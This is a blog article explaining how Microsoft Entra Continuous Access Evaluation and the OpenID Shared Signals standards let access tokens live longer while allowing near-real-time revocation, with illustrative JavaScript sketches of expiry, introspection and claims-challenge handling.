Parag Mali - tag: zero-trust

The 28-Hour Bargain: How Continuous Access Evaluation Made Long-Lived Tokens Safe

noreply@paragmali.com (Parag Mali) — Sat, 30 May 2026 00:00:00 GMT

**Microsoft Entra Continuous Access Evaluation (CAE) lets access tokens safely live up to 28 hours.** It works by maintaining a push-subscription channel between Entra and Microsoft 365 resource providers, so that when a user is disabled, has their password reset, or has MFA enabled, the resource provider rejects the next request with a `401` and a claims challenge -- typically within 15 minutes for critical events, instantly for IP-location changes [@ms-cae-concept]. The same pattern was standardized by the OpenID Foundation on September 2, 2025 as SSF 1.0, CAEP 1.0, and RISC 1.0 Final Specifications [@openid-three-final-specs], opening the door to vendor-neutral cross-SaaS revocation. CAE does **not** solve token theft (use DPoP for that) and does **not** cover Microsoft Defender for Endpoint or Intune as resource providers (they are signal sources into Conditional Access, not CAE consumers).

1. Your Fired Employee Is Still Reading Email

09:00 Tuesday. The administrator disables the account at 09:01. At 09:23, the ex-employee's open Outlook on the web tab refreshes -- and pulls down new mail. This is not a bug. This is RFC 6749 working exactly as designed. Until Microsoft Entra shipped a fix that took ten years and three standards bodies -- the IETF, the OpenID Foundation, and NIST -- to develop, the access token that user held at 09:00 stayed cryptographically valid until 10:00 at the latest, and there was nothing Conditional Access could do about it [@rfc-6749].

The window has a name now. It did not, for most of cloud identity's history. Microsoft's own documentation calls it "the lag between when conditions change for a user, and when policy changes are enforced" [@ms-cae-concept]. Between sign-in (Conditional Access territory) and the next token refresh (refresh-token territory) sits a stretch of time in which Conditional Access decisions have no enforcement surface. That stretch ranged from 60 minutes to 24 hours, depending on tenant configuration. For every OAuth 2.0 deployment from 2012 onward, this was the security debt the industry carried.

Note: "Microsoft Entra ID" is the rebranded name for what most engineers learned as "Azure Active Directory" or "Azure AD." Microsoft announced the rename in July 2023 [@ms-entra-rename-2023]; the underlying service, tenants, app registrations, and APIs are unchanged. Throughout this article, "Entra" and the older "Azure AD" refer to the same identity platform.

This article explains the engineering pattern that lets a Microsoft 365 tenant do two things that look contradictory at the same time: extend access-token lifetime from 1 hour to up to 28 hours, and revoke a disabled user's session in under 15 minutes [@ms-cae-concept]. The reconciling idea is a near-real-time push channel between the identity provider (Entra) and a small set of cooperating resource providers. When you can revoke a token in minutes rather than waiting for it to expire, expiry stops doing the security work, and the token can live as long as the user actually needs it.

Continuous Access Evaluation (CAE): Microsoft Entra's push-subscription channel between the identity provider and cooperating resource providers (Exchange Online, SharePoint Online, Teams, and Microsoft Graph). CAE lets a resource provider revoke an already-issued access token in near-real-time -- up to 15 minutes for critical events, instantly for IP-location changes -- without waiting for the token to expire [@ms-cae-concept].

The trade has a price. The 15-minute critical-event service-level objective is the price the channel pays for fanning out events across hyperscale Microsoft 365 infrastructure. Sub-second revocation is possible -- other vendors demonstrate it at smaller scales -- but at Exchange-Online volume, 15 minutes is the engineering economics. We will earn that number by Section 8.

For now: the OAuth 2.0 designers knew about this gap when they wrote RFC 6749 in 2012. They chose it on purpose. To see why, and to see why the obvious patches all failed, we have to walk back to the moment the trade was made.

2. The Static-Expiry Compromise

In October 2012, Dick Hardt of Microsoft published RFC 6749 -- The OAuth 2.0 Authorization Framework -- as the editor of record for an IETF working group that had spent five years arguing about it [@rfc-6749]. Section 1.4 carries one of the most consequential adjectives in cloud-identity history. Access tokens, it says, are credentials "usually with a short lifetime" used by the client to access a protected resource. The word usually is doing heavy lifting. Nothing in the protocol enforces it. Nothing in the protocol provides revocation. Nothing in the protocol stops a server from issuing 24-hour bearer tokens that, once minted, stay cryptographically valid until they expire on their own.

This was a deliberate trade. To see why it was rational, remember what came before.

Web Access Management: the model OAuth replaced

Web Access Management (WAM): The pre-2012 enterprise-identity pattern in which every protected HTTP request synchronously queried a central Policy Decision Point (PDP). Strength: instant revocation, because every request consulted authoritative state. Weakness: a chatty bottleneck that did not scale to cloud volumes and could not federate trust across organizations.

Web Access Management dominated enterprise identity from the late 1990s into the early 2010s. Every protected HTTP request to a WAM-fronted application made a synchronous round-trip to a Policy Decision Point. The PDP held authoritative session and policy state. Revoke a user? The next request failed, immediately, because the PDP said no. No token-lifetime window. No gap between policy change and enforcement.

WAM was correct. WAM was also unworkable for the web that was coming. It did not scale: every request was a network hop. It did not federate: cross-organization SaaS meant the PDP could not live inside any one company's network. And it required every protected resource to participate in a single trust domain. By the time enterprises were running cross-organization SaaS at scale, the WAM model had run out of road.

The OAuth 2.0 authors made the opposite trade. Replace the chatty PDP round-trip with a self-contained signed bearer token -- a JWT the resource server validates locally. Validation becomes O(1) cryptographic verification with no round-trip. Throughput scales horizontally. Federation works, because the JWT carries its own attestation of the issuer. Revocation becomes...approximated. By expiry. The token is valid until it isn't, and you trust that the lifetime is short enough.
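The consequence of expiry-only revocation can be made concrete with the opening scenario. The following is a minimal sketch, not a real resource-server implementation: signature verification is assumed to have already succeeded, the function name `acceptsToken` is hypothetical, and times are expressed as seconds since midnight purely for readability.

```javascript
// Hypothetical sketch of a Generation-1 resource server check.
// Signature verification is assumed to have succeeded already;
// only the expiry logic is modeled here.
function acceptsToken(claims, nowSeconds) {
  // The only time-dependent input is the token's own 'exp' claim.
  return nowSeconds < claims.exp;
}

// Seconds since midnight on the same Tuesday, for readability.
const at = (hh, mm) => hh * 3600 + mm * 60;

const token = { sub: "ex-employee", iat: at(9, 0), exp: at(10, 0) };
// Known to the identity provider, invisible to the resource server.
const accountDisabledAt = at(9, 1);

console.log(acceptsToken(token, at(9, 23))); // true
console.log(acceptsToken(token, at(10, 0))); // false
console.log((token.exp - accountDisabledAt) / 60); // 59
```

The disable time never appears as an input to `acceptsToken`, which is the whole problem: the 09:23 request succeeds, and the exposure in this example lasts 59 minutes.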

For a 2012 web of forum logins and consumer mashups, "short enough" was a defensible answer. For a 2020 enterprise running compliance-bound SaaS across thousands of employees, it was not.

The Zero Trust pressure

Two intellectual pressures forced the question. The first came from Google. In December 2014, Rory Ward and Betsy Beyer published BeyondCorp: A New Approach to Enterprise Security in USENIX ;login: [@ward-beyer-2014-beyondcorp]. (Beyer would later co-author Site Reliability Engineering (O'Reilly, 2016); BeyondCorp came out of the same Google culture of evidence-driven infrastructure engineering.) The argument was philosophical: a session is not a one-shot decision at sign-in. It is a time-varying authorization. Trust signals -- device posture, network location, behavioral risk -- change continuously, and the access decision should change with them. BeyondCorp was not a CAE implementation; it predates the term. But it planted the seed that login-time enforcement was not enough.

The second pressure was bureaucratic. In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture, by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly [@nist-sp-800-207]. SP 800-207 codified the BeyondCorp philosophy as U.S. federal guidance. One sentence made the engineering investment commercially rational: "Authentication and authorization (both subject and device) are discrete functions performed before a session to an enterprise resource is established." A federal mandate for continuous re-evaluation pushed every cloud vendor with U.S. government contracts to find an implementation. The gap RFC 6749 had left was now a procurement problem.

A name for the problem

The third moment named the gap. On February 21, 2019, Atul Tulshibagwale, then an engineer at Google, published Re-thinking federated identity with the Continuous Access Evaluation Protocol on the Google Cloud blog [@tulshibagwale-2019-google-blog]. The post introduced a term -- CAEP -- and a framing: publish-and-subscribe between identity providers and resource providers, as a third option between WAM's per-request chattiness and OAuth's fire-and-forget expiry. We return to Tulshibagwale's actual proposal in Section 5. For now what matters: 2019 was the year the industry got a vocabulary for a problem it had been carrying for seven years.

The OpenID Foundation working group that grew out of Tulshibagwale's proposal was originally chartered as the Shared Signals & Events (SSE) working group. It was renamed Shared Signals in subsequent years, but older industry write-ups from 2020-2022 still use the SSE abbreviation [@idsalliance-2022-11-cae].

gantt
    title CAE and Shared Signals timeline (2012-2025)
    dateFormat YYYY-MM
    axisFormat %Y
    section IETF standards
    RFC 6749 OAuth 2.0 :done, a1, 2012-10, 30d
    RFC 7009 Token Revocation :done, a2, 2013-08, 30d
    RFC 7662 Token Introspection :done, a3, 2015-10, 30d
    RFC 8417 SET :done, a4, 2018-07, 30d
    RFC 8935 SET Push :done, a5, 2020-11, 30d
    RFC 8936 SET Poll :done, a6, 2020-11, 30d
    section Zero Trust thinking
    BeyondCorp paper :done, b1, 2014-12, 30d
    NIST SP 800-207 Final :done, b2, 2020-08, 30d
    section CAEP origin and OIDF
    Tulshibagwale CAEP post :done, c1, 2019-02, 30d
    OIDF Shared Signals WG :done, c2, 2019-09, 30d
    SSF 1.0 CAEP 1.0 RISC 1.0 :done, c3, 2025-09, 30d
    section Microsoft Entra CAE
    Limited preview Weinert :done, d1, 2020-04, 30d
    Expanded preview Simons :done, d2, 2020-10, 30d
    General Availability :done, d3, 2022-01, 30d

The OAuth 2.0 designers traded revocation latency for throughput on purpose [@rfc-6749]. Once that gap proved unacceptable, three obvious patches were tried. None of them worked. To see why none of them worked is to understand the negative space CAE was designed to fill.

3. Three Patches, Three Failures

Between 2013 and the late 2010s, the OAuth community published three patches for RFC 6749's revocation gap. Each was rationally adopted; each was rationally abandoned at hyperscale. This section is the genealogy of those failures, because what each one got wrong defines the shape of the design that finally worked.

Patch 1: RFC 7009 -- the `/revoke` endpoint (August 2013)

In August 2013, Torsten Lodderstedt of Deutsche Telekom, Stefanie Dronia, and Marius Scurtescu of Google published RFC 7009, OAuth 2.0 Token Revocation [@rfc-7009]. The contribution was a standardized HTTP endpoint, /revoke, that a client could POST a token to in order to invalidate it. The mental model is the logout button: when a user signs out, the client tells the authorization server "I'm done with this token, please retire it."

The failure mode is in the threat model. RFC 7009 is client-initiated. The token holder asks for revocation. But the scenario that motivates CAE is precisely the one where the token holder is uncooperative. A fired employee will not POST their access token to /revoke on the way out the door. An attacker who has stolen a token will certainly not. The administrator on the other side cannot use the endpoint either, because they do not possess the bearer token.

Worse, RFC 7009's Implementation Note (Section 3) is candid about self-contained tokens: the only recourse it names is "some (currently non-standardized) backend interaction between the authorization server and the resource server" when immediate revocation is desired [@rfc-7009]. Read that carefully. The spec admits there is no spec. The JWT in flight at the resource server is cryptographically valid until it expires. The authorization server can mark it revoked in a local database, but the resource server never asks. It validates the signature locally. The revocation event never crosses the wire.

RFC 7009 works for opaque tokens with a token-introspection back-channel. It does not, by itself, solve revocation for self-contained JWT bearers -- which by the mid-2010s were the dominant pattern in the cloud.
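To see why the endpoint is useless to an administrator, it helps to look at what a revocation request has to contain. The sketch below builds the form-encoded request shape that RFC 7009 describes (`token` plus the optional `token_type_hint`); the endpoint URL, client identifier, and secret are hypothetical placeholders, and nothing is sent over the network.

```javascript
// Sketch of the request an RFC 7009 client would send.
// The endpoint URL and client credentials are hypothetical placeholders.
function buildRevocationRequest(endpoint, token, clientId, clientSecret) {
  const body = new URLSearchParams({
    token,                           // the token being retired
    token_type_hint: "access_token", // optional hint defined by RFC 7009
  });
  return {
    url: endpoint,
    method: "POST",
    headers: {
      "Content-Type": "application/x-www-form-urlencoded",
      // Client authentication via HTTP Basic, one common option.
      Authorization: "Basic " + btoa(`${clientId}:${clientSecret}`),
    },
    body: body.toString(),
  };
}

const request = buildRevocationRequest(
  "https://as.example.com/revoke", "abc123", "client-1", "s3cret");
console.log(request.body); // token=abc123&token_type_hint=access_token
```

The first field of the body is the token itself. Whoever calls the endpoint must already hold the credential, which is exactly what the administrator in the fired-employee scenario does not have.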

Patch 2: RFC 7662 -- the `/introspect` endpoint (October 2015)

Two years later, in October 2015, Justin Richer published RFC 7662, OAuth 2.0 Token Introspection [@rfc-7662]. The mechanism: on every request, the resource server calls a /introspect endpoint on the authorization server with the bearer token. The AS replies with the token's current state. If the token has been revoked, /introspect returns active: false, and the resource server denies the request.

This is correct. It also reintroduces the WAM bottleneck that OAuth was designed to escape.

For an AS serving billions of requests per day -- Microsoft Graph as one example, Google's IdP as another -- making /introspect the per-request critical path turns the authorization server into a synchronous dependency on every API call against every resource server in the estate. Latency adds up. Availability becomes shared. If the AS has a bad five minutes, every resource server has a bad five minutes simultaneously. The architecture OAuth bought with self-contained tokens -- resource server scales independently of AS -- gets traded back for exactly the WAM property that motivated OAuth's existence.
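The coupling is easy to demonstrate with a toy model. The following sketch simulates an authorization server and a resource server in memory; the class and function names are hypothetical, and only the `active` boolean mirrors the RFC 7662 response shape.

```javascript
// Simulated authorization server; names and storage are hypothetical.
class AuthorizationServer {
  constructor() {
    this.revoked = new Set();
    this.introspectionCalls = 0;
  }
  revoke(token) {
    this.revoked.add(token);
  }
  // Mirrors the RFC 7662 response shape: an object with an 'active' boolean.
  introspect(token) {
    this.introspectionCalls += 1;
    return { active: !this.revoked.has(token) };
  }
}

// Resource server that consults the authorization server on every request.
function handleRequest(authServer, token) {
  return authServer.introspect(token).active ? 200 : 401;
}

const authServer = new AuthorizationServer();
const statuses = [];
for (let i = 0; i < 1000; i++) {
  if (i === 500) authServer.revoke("tok-1"); // admin revokes mid-stream
  statuses.push(handleRequest(authServer, "tok-1"));
}
console.log(statuses[499], statuses[500]); // 200 401
console.log(authServer.introspectionCalls); // 1000
```

Revocation takes effect on the very next request, but the call counter equals the request count. In this model the authorization server does one unit of work per API call, which is the property that does not survive hyperscale volumes.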

RFC 7662 introspection is alive and well. It remains the right choice for opaque-token systems and on-premises IdPs where the resource server count is small, the per-request latency budget is generous, and the AS is well within capacity. The criticism here is structural and only applies at hyperscale public-cloud volumes. RFC 7662 was not killed by RFC 7009 or by CAE; it is a parallel path that continues to serve a substantial fraction of the deployed OAuth surface.

Patch 3: Make the token life so short revocation does not matter

The third patch was the obvious one. If you cannot revoke a token mid-life, make its life short. Issue access tokens with a minutes-long lifetime, the way early Microsoft experiments did. The revocation window collapses. Problem solved.

Microsoft tried it. The retrospective is unusually candid. On April 21, 2020, Alex Weinert, then Director of Identity Security at Microsoft, published Moving towards real time policy and security enforcement on the Azure Active Directory Identity Blog [@weinert-2020-04-real-time]. (The original lives at post ID 1276933 on Microsoft's tech community; the full body is preserved in Microsoft's Japanese translation on the jpazureid GitHub mirror [@jpazureid-blog-1-japanese].) The post names the failure mode in one sentence:

"We have experimented with the "blunt object" approach of reduced token lifetimes but found they can degrade user experiences and reliability without eliminating risks." -- Alex Weinert, Microsoft, April 21, 2020 [@weinert-2020-04-real-time]

Two things break. First, user experience and reliability. Every short-lifetime boundary forces every active client to round-trip the IdP for a fresh token. For Outlook, Teams, Word Online, OneDrive, and every other client an enterprise user has open at once, that is a wave of token requests per user per cycle. Multiplied by Microsoft 365 active users, the load profile creates real outages. Network blips that would otherwise be invisible surface as failed refreshes, with user-visible re-authentication prompts. Second, it does not eliminate the risk. A minutes-long window is still a window. A fired employee can read or exfiltrate a great deal of email in that window. You have paid the full user-experience cost and still left a non-trivial breach surface.
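The load side of that argument is simple arithmetic. The sketch below computes how many token requests a single user generates per day at different access-token lifetimes; the figure of five concurrently open clients per user is a hypothetical workload chosen for illustration, not a Microsoft number.

```javascript
// Token refreshes one client needs per day for a given lifetime.
function refreshesPerDay(lifetimeMinutes) {
  return (24 * 60) / lifetimeMinutes;
}

// Total token requests per user per day across all open clients.
function tokenRequestsPerUserPerDay(lifetimeMinutes, clientsPerUser) {
  return refreshesPerDay(lifetimeMinutes) * clientsPerUser;
}

// Hypothetical workload: 5 concurrently open clients per user.
const clientsPerUser = 5;
for (const lifetime of [5, 15, 60]) {
  const total = tokenRequestsPerUserPerDay(lifetime, clientsPerUser);
  console.log(`${lifetime}-minute tokens: ${total} requests per user per day`);
}
```

Under these assumptions a 5-minute lifetime costs 1440 token requests per user per day against 120 for the 1-hour default, a twelvefold increase in identity-provider load, and the fired employee still gets up to five minutes of access.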

This was the third failure. The negative space across the three patches defines the shape any real solution has to take: it must be server-initiated (not RFC 7009), it must be push-based rather than per-request poll (not RFC 7662), and it must separate revocation from expiry so the IdP does not pay for every revocation with a refresh-load spike (not the short-lifetime patch). The three failures exhaust the surface of the obvious fix.

Note: Each of the three patches fails for a different reason; together they rule out everything except server-initiated push subscription that decouples revocation from expiry.

If the patches all fail, the next move has to be architectural. The first published statement of that architecture was Atul Tulshibagwale's February 2019 Google blog post -- and the move he proposed is the one Microsoft would ship three years later.

4. Four Generations of Session Enforcement

Walk forward through the genealogy of session enforcement and the breakthrough in Section 5 stops looking like a stroke of genius and starts looking like the only move the design space had left. Four generations, each killed by a documented limit of the previous one.

Generation 0: WAM (pre-2012)

Per-request synchronous round-trip to a Policy Decision Point. Instant revocation; chatty bottleneck; no federation. Killed by cloud-scale request rates and the rise of cross-organization SaaS, where the protected resource and the policy authority no longer lived in the same trust domain. WAM remains valuable in single-tenant enterprise contexts, but for the public-cloud API mesh it cannot scale.

Generation 1: Static-expiry JWT (2012-2020)

Self-contained signed bearer tokens validated locally at the resource server. Revocation approximated by expiry per RFC 6749 [@rfc-6749]. Throughput scales; federation works; revocation is acceptable when the lifetime is short and the threat model is benign. Killed by (a) the fired-employee window, (b) the three failed Section 3 patches, and (c) the philosophical pressure from Zero Trust to treat sessions as continuously re-evaluated.

Generation 2: Microsoft CAE (limited preview April 2020, GA January 10, 2022)

The first production solution. Limited preview launched in April 2020 with Alex Weinert's Moving towards real time policy and security enforcement announcement [@weinert-2020-04-real-time]. Expanded public preview October 2020 [@simons-2020-10-expanded-preview; @vansurksum-2020-10-10]. General Availability January 10, 2022, announced by Alex Simons, Corporate VP for Program Management in the Microsoft Identity Division [@simons-2022-01-ga-rss].

The architecture is a private push-subscription channel between Entra and a small set of Microsoft 365 resource providers, with a wire-level handshake (the claims challenge) for telling the client to re-acquire a token reflecting new state. Access-token lifetime extends from the default 1 hour to up to 28 hours specifically for CAE-aware sessions [@ms-cae-concept]. We will unpack the mechanism in Section 5.

The Gen-2 limitation that motivated Gen 3: the wire format is Microsoft-internal. A SaaS vendor that wants the same revocation properties for its own resource provider cannot use Microsoft's CAE channel. The protocol does not federate.

Generation 3: OpenID SSF 1.0 + CAEP 1.0 + RISC 1.0 (Final Specifications, September 2, 2025)

The OpenID Foundation generalized the Microsoft pattern into a vendor-neutral specification. On September 2, 2025, three Final Specifications were approved: the Shared Signals Framework 1.0 (SSF), the Continuous Access Evaluation Profile 1.0 (CAEP), and the Risk and Incident Sharing and Coordination 1.0 (RISC) [@openid-three-final-specs; @openid-sharedsignals-wg].

The wire envelope is IETF RFC 8417's Security Event Token (SET), published in July 2018 by Phil Hunt (Oracle), Michael Jones (Microsoft), William Denniss (Google), and Morteza Ansari (Cisco) [@rfc-8417]. A SET is a signed JWT carrying a single security event. The transport layer is RFC 8935 push (POST over TLS from transmitter to receiver) and RFC 8936 poll (recipient-initiated retrieval), both published November 2020 by Annabelle Backman and collaborators [@rfc-8935; @rfc-8936]. SSF defines the subscription model -- streams, subjects, transmitter and receiver metadata endpoints. CAEP and RISC define the vocabulary of events that can ride that envelope.

Security Event Token (SET): IETF RFC 8417's standardized signed-JWT envelope for transmitting security-relevant events between systems. Each SET carries exactly one event with a well-defined event-type URI; the envelope is signature-protected and timestamp-bearing. SET is the wire format underlying CAEP, SSF, and RISC, as well as Microsoft's internal CAE protocol [@rfc-8417].

RFC 8417 was a cross-vendor IETF effort that pre-dated the OpenID Shared Signals working group by a year. Phil Hunt was at Oracle; Michael Jones at Microsoft; William Denniss at Google; Morteza Ansari at Cisco. The envelope-only design -- leaving event vocabularies to higher-layer profiles -- is what allowed both Microsoft's internal protocol and the OpenID profiles to converge on the same wire format without coordination [@rfc-8417].
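A SET is easier to reason about once you see its claims set. The sketch below assembles an unsigned payload for a CAEP session-revoked event and checks it for the claims RFC 8417 requires as I read it (`iss`, `iat`, `jti`, `events`). Treat the details as assumptions to verify against the Final Specifications: the top-level `sub_id` placement and the `event_timestamp` field follow my reading of SSF 1.0 and CAEP 1.0, and the issuer, audience, identifier, and subject values are placeholders. Signing is omitted entirely.

```javascript
// Event-type URI for the CAEP session-revoked event.
const SESSION_REVOKED =
  "https://schemas.openid.net/secevent/caep/event-type/session-revoked";

// Sketch of a SET payload (the JWT claims set, before signing).
function buildSetPayload({ issuer, audience, jti, subject, issuedAt }) {
  return {
    iss: issuer,
    aud: audience,
    jti,             // unique identifier for this SET
    iat: issuedAt,   // issuance time, epoch seconds
    sub_id: subject, // assumed top-level placement per SSF 1.0
    events: { [SESSION_REVOKED]: { event_timestamp: issuedAt } },
  };
}

// Checks for the claims RFC 8417 marks as required.
function hasRequiredSetClaims(payload) {
  const required = ["iss", "iat", "jti", "events"];
  return required.every((claim) => payload[claim] !== undefined)
    && Object.keys(payload.events).length > 0;
}

const payload = buildSetPayload({
  issuer: "https://idp.example.com/",
  audience: "https://rp.example.com/",
  jti: "756E69717565206964656E746966696572",
  subject: { format: "email", email: "user@example.com" },
  issuedAt: 1720480043,
});
console.log(hasRequiredSetClaims(payload)); // true
```

The envelope says nothing about what "session revoked" means to the receiver. That separation, envelope at the bottom and vocabulary on top, is the layering the rest of this section describes.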

flowchart TD
    L4["Layer 4: Event vocabularies<br/>CAEP 1.0 (session) and RISC 1.0 (account)"]
    L3["Layer 3: Subscription and stream model<br/>OpenID SSF 1.0"]
    L2["Layer 2: HTTP transport<br/>RFC 8935 push, RFC 8936 poll"]
    L1["Layer 1: Signed event envelope<br/>RFC 8417 Security Event Token (SET)"]
    L4 --> L3
    L3 --> L2
    L2 --> L1

The generation chain has a documented engineering reason for each transition. The comparison matrix below pulls the essentials together.

| Approach | Year | Revocation latency | Strengths | Weaknesses |
| --- | --- | --- | --- | --- |
| WAM (Gen 0) | pre-2012 | Instant | Authoritative state, instant enforcement | No federation, per-request bottleneck |
| Static-expiry JWT (Gen 1) | 2012-2020 | Up to token lifetime (1h-24h) | O(1) RP validation, federation works | No revocation; fired-employee window |
| Short-lifetime patch | mid-2010s | Minutes | Conceptually simple | Load amplification, window remains, UX degradation |
| RFC 7662 introspection | 2015 onward | Instant | Standardized, works for opaque tokens | AS becomes per-request critical path |
| Microsoft CAE (Gen 2) | 2020-2022 | Up to 15 min critical; instant IP | Push, decoupled from request rate, long tokens safe | Microsoft-internal protocol; tiny RP set |
| OpenID SSF/CAEP (Gen 3) | 2025 onward | Vendor-dependent | Vendor-neutral standard, cross-SaaS | Receiver adoption still early |

flowchart LR
    G0["Gen 0: WAM<br/>per-request PDP"]
    G1["Gen 1: Static-expiry JWT<br/>RFC 6749 (2012)"]
    G2["Gen 2: Microsoft CAE<br/>GA January 2022"]
    G3["Gen 3: OpenID SSF and CAEP<br/>Final September 2025"]
    G0 -- "cloud scale and federation" --> G1
    G1 -- "fired-employee window, patches fail" --> G2
    G2 -- "Microsoft-only, no cross-SaaS" --> G3

Knowing the lineage is not knowing the trick. What is the actual mechanism CAE deploys -- the thing that turns this standards-history arc into a feature that ships and makes 28-hour tokens defensible? It has three parts, and once you see them together, you understand why long tokens are safe.

5. Subscription, Claims Challenge, Extended Lifetime

Three innovations, none new in isolation, all unprecedented in combination. This is the section where you see the trick.

Atul Tulshibagwale's 2019 framing names the move: "Our vision for continuous access evaluation is based on a publish-and-subscribe ('pub-sub') approach... It's complementary to federated or cert-based authentication... It's not as chatty as WAM... It doesn't impact latency for user access" [@tulshibagwale-2019-google-blog]. Pub-sub is the third option between WAM's per-request chattiness and RFC 6749's fire-and-forget. Subscription is the channel; claims challenge is the wire-level handshake; extended lifetime is the user-experience prize.

Part 1: Subscription

Microsoft's CAE concept page describes the architecture in one sentence that rewards close reading:

"Timely response to policy violations or security issues really requires a 'conversation' between the token issuer Microsoft Entra, and the relying party (enlightened app)." -- Microsoft Learn, *Continuous access evaluation in Microsoft Entra* [@ms-cae-concept]

The word conversation is the architecture. The relying party (a CAE-aware Microsoft 365 workload such as Exchange Online) subscribes to a finite, documented set of critical events for the subjects it cares about. Entra pushes events to the RP as state changes. State is cached at the RP. On the hot path -- the per-request data plane -- the RP does an O(1) JWT signature verification plus an O(1) hash-table lookup of cached revocation state. No back-channel round-trip on the hot path. The 28-hour token costs no more to validate than the 1-hour token it replaced [@ms-cae-concept].

This is the move that defeats RFC 7662. The state lives at the RP, not at the AS. The control-plane cost scales with the rate of events, not the rate of requests. Push, not poll.
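The split between control plane and data plane can be sketched in a few lines. This is an illustrative in-memory model, not Microsoft's implementation: the class, its method names, and the event shape are hypothetical, and JWT signature verification is assumed to have happened before `authorize` is called. The `tid` and `sub` fields stand in for the tenant and subject claims of the token.

```javascript
// Hypothetical in-memory model of a CAE-aware resource provider.
class ResourceProvider {
  constructor() {
    // "tenant|subject" -> epoch seconds of the latest critical event
    this.revokedAfter = new Map();
  }

  // Control plane: runs once per pushed event, not once per request.
  onCriticalEvent({ tenant, subject, occurredAt }) {
    const key = `${tenant}|${subject}`;
    const previous = this.revokedAfter.get(key) ?? 0;
    this.revokedAfter.set(key, Math.max(previous, occurredAt));
  }

  // Data plane: a single Map lookup, no call to the identity provider.
  authorize(claims) {
    const cutoff = this.revokedAfter.get(`${claims.tid}|${claims.sub}`);
    if (cutoff !== undefined && claims.iat <= cutoff) {
      return { status: 401, notBefore: cutoff };
    }
    return { status: 200 };
  }
}

const rp = new ResourceProvider();
const oldToken = { tid: "contoso", sub: "alice", iat: 1000 };
console.log(rp.authorize(oldToken).status); // 200
rp.onCriticalEvent({ tenant: "contoso", subject: "alice", occurredAt: 1500 });
console.log(rp.authorize(oldToken).status); // 401
console.log(rp.authorize({ ...oldToken, iat: 1600 }).status); // 200
```

The work done in `onCriticalEvent` scales with how often users are disabled or reset, while `authorize` stays a constant-time lookup however many requests arrive. A token issued after the event passes, which is what makes the re-acquisition handshake in the next part possible.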

Part 2: The claims challenge

When state at the RP changes -- because a push event has arrived saying "this user's password has been reset" -- the RP cannot reach into a request that has already been accepted and is being served. CAE is in-band with the next request, not the current one. The next time the client presents the stale token, the RP rejects it with HTTP 401 and a specific header:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer error="insufficient_claims",
                  claims="eyJhY2Nlc3NfdG9rZW4iOnsiYWNyc..."

The claims parameter is a base64url-encoded JSON object that tells the client what to re-acquire from the IdP. The Microsoft Authentication Library (MSAL) on the client decodes the challenge transparently and requests a new access token from Entra with the indicated claims. Entra either issues a fresh CAE-aware token (if authorization still holds) or rejects, forcing interactive re-authentication. The client retries the original API call with the new token [@ms-cae-app-resilience].

Claims challenge: The HTTP-level mechanism by which a CAE-aware resource provider signals to a client that the presented token must be re-acquired with fresh state. The challenge is conveyed as a `WWW-Authenticate: Bearer error="insufficient_claims"` header with a base64url-encoded `claims` parameter; current Microsoft Authentication Library (MSAL) releases decode and handle it automatically when the client declares the `cp1` client capability, which Entra surfaces to the resource provider as the `xms_cc` claim in the access token [@ms-cae-app-resilience].

This is the move that defeats RFC 7009. Revocation is initiated by the resource provider's view of the IdP's state, not by the token holder. A fired employee's client cannot opt out of the claims challenge; the RP will not serve any further request until a fresh token arrives that reflects the post-revocation state.

// A real-shape WWW-Authenticate header from a CAE-aware resource provider.
// The 'claims' parameter is base64url-encoded JSON.
const header = 'Bearer error="insufficient_claims", claims="eyJhY2Nlc3NfdG9rZW4iOnsibmJmIjp7ImVzc2VudGlhbCI6dHJ1ZSwgInZhbHVlIjoiMTcyMDQ4MDA0MyJ9fX0="';

// Extract the claims parameter
const match = header.match(/claims="([^"]+)"/);
const b64 = match ? match[1] : null;

// base64url decode (Node 'Buffer' would work; here we use the browser-safe approach)
function b64urlDecode(s) {
  s = s.replace(/-/g, '+').replace(/_/g, '/');
  while (s.length % 4) s += '=';
  return atob(s);
}

const claimsJson = b64urlDecode(b64);
console.log(JSON.parse(claimsJson));
// {
//   "access_token": {
//     "nbf": {
//       "essential": true,
//       "value": "1720480043"
//     }
//   }
// }
// MSAL reads this and requests a new token whose 'nbf' (not-before) is at least
// the supplied timestamp -- i.e., a token issued after the state change.

The nbf (not-before) claim challenge is the most common shape: the RP is telling the client "give me a token issued after this moment." The client requests one. Entra checks current state -- did the user get disabled? did the password get reset? did the risk score elevate? -- and either issues or denies. The wire format is simple enough to inspect in a browser tab, which is part of why the architecture has been able to standardize: there is no magic to reverse-engineer.
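The client side of the handshake is a retry-once loop. The following sketch shows the control flow under stated assumptions: `callApi` and `acquireToken` are hypothetical stand-ins supplied by the caller, not MSAL functions, and the response is modeled as a plain object with a `status` and lower-cased `headers`. A real client would hand the extracted claims to its authentication library rather than to a fake.

```javascript
// Returns the raw 'claims' value from a claims challenge, or null.
function extractClaimsChallenge(wwwAuthenticate) {
  if (!wwwAuthenticate ||
      !wwwAuthenticate.includes('error="insufficient_claims"')) {
    return null;
  }
  const match = wwwAuthenticate.match(/(?:^|[\s,])claims="([^"]+)"/);
  return match ? match[1] : null;
}

// Hypothetical retry loop: one call, at most one re-acquisition, one retry.
async function callWithCae(callApi, acquireToken) {
  let token = await acquireToken(null);
  let response = await callApi(token);
  if (response.status === 401) {
    const claims = extractClaimsChallenge(response.headers["www-authenticate"]);
    if (claims) {
      token = await acquireToken(claims); // may reject if the IdP refuses
      response = await callApi(token);    // retry exactly once
    }
  }
  return response;
}

// In-memory fakes: the first token is stale, the second is fresh.
const challenge = 'Bearer error="insufficient_claims", claims="ZmFrZQ=="';
const fakeApi = async (token) =>
  token === "fresh"
    ? { status: 200, headers: {} }
    : { status: 401, headers: { "www-authenticate": challenge } };
const fakeAcquire = async (claims) => (claims ? "fresh" : "stale");

callWithCae(fakeApi, fakeAcquire).then((r) => console.log(r.status)); // 200
```

Retrying only once is a deliberate choice in this sketch: if the second token is also rejected, looping would hammer the identity provider, so the 401 is returned to the caller instead. For a disabled user the second `acquireToken` call is where the session ends, because the identity provider refuses to issue.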

Part 3: Extended lifetime, the prize

The first two parts buy you the third. Once revocation is push-based and the claims challenge gives the RP a way to evict stale tokens within seconds of seeing a control-plane event, the expiry timer stops carrying the security weight. Tokens can live longer because the expiry is no longer the only revocation mechanism.

